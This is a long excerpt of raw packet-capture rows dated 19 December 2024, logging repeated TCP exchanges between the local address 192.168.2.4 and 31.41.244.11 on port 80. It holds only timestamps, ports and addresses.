                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919646025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919657946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919672012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919693947 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919722080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.920320988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.920331955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.920344114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.920372963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.920399904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921073914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921086073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921097040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921118021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921142101 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921794891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921808958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.921849966 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922135115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922147036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922158003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922183990 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922208071 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922946930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922960043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922971010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.922993898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.923022032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.923882008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.923893929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.923934937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.924292088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.924304962 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.924315929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.924356937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.924369097 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925009012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925023079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925035000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925057888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925092936 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925725937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925740004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.925779104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926018000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926035881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926047087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926078081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926101923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926697016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926708937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926721096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926772118 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.926784039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.927479982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.927494049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.927505970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.927519083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.927542925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.927577019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928059101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928071976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928113937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928172112 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928534031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928545952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928558111 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928584099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.928611040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.929280996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.929295063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.929306984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.929342985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.929367065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.930119991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.930131912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.930145025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.930156946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.930166006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.930197954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.073288918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.073343992 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.073482990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.073496103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.073522091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.073543072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.074019909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.074070930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.074461937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.074492931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.074505091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.074533939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.074570894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.076992989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.077011108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.077023029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.077030897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.077045918 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.077061892 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.077733040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.077783108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.078547955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.078594923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.079324007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.079343081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.079355955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.079370975 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.079396009 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.082345009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.082356930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.082367897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.082412004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.082442999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.083127975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.083173037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.084955931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.084969044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.085011005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.085917950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.085930109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.085963011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.085987091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.087477922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.087528944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.087987900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088040113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088052034 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088063955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088079929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088109970 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088690042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088728905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088728905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088742018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088758945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.088774920 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.090648890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.090662956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.090708971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.090713978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.090727091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.090745926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.090770960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091286898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091301918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091319084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091329098 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091345072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091358900 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091895103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091907978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091917992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091939926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.091957092 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.108484030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.108537912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.108584881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.108597994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.108622074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.108643055 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.108994961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.109141111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.109216928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.109230042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.109255075 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.109288931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.109612942 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.109957933 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110012054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110080004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110093117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110125065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110481977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110521078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110794067 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110807896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110831976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.110846996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111414909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111428022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111481905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111481905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111581087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111622095 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111628056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111643076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111669064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.111682892 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.112268925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.112319946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.112591982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.112606049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.112648010 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113132954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113178015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113331079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113372087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113384962 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113396883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113424063 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.113440990 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.114306927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.114321947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.114335060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.114357948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.114382982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115216017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115231037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115242958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115256071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115266085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115303993 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115860939 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115875006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115911007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.115933895 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.116319895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.116333008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.116360903 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.116378069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.116750956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.116764069 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.116803885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117124081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117152929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117163897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117166042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117188931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117202997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117923975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117937088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117949009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.117989063 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118551970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118566036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118606091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118628979 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118851900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118864059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118875027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118891001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.118908882 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.119585037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.119618893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.119626999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.119630098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.119649887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.119664907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120238066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120250940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120291948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120306015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120549917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120562077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120573997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120599985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.120624065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.121232986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.121247053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.121259928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.121289968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.121311903 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122001886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122014999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122026920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122039080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122052908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122081041 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122689009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122705936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122718096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.122730970 CET804974331.41.244.11192.168.2.4
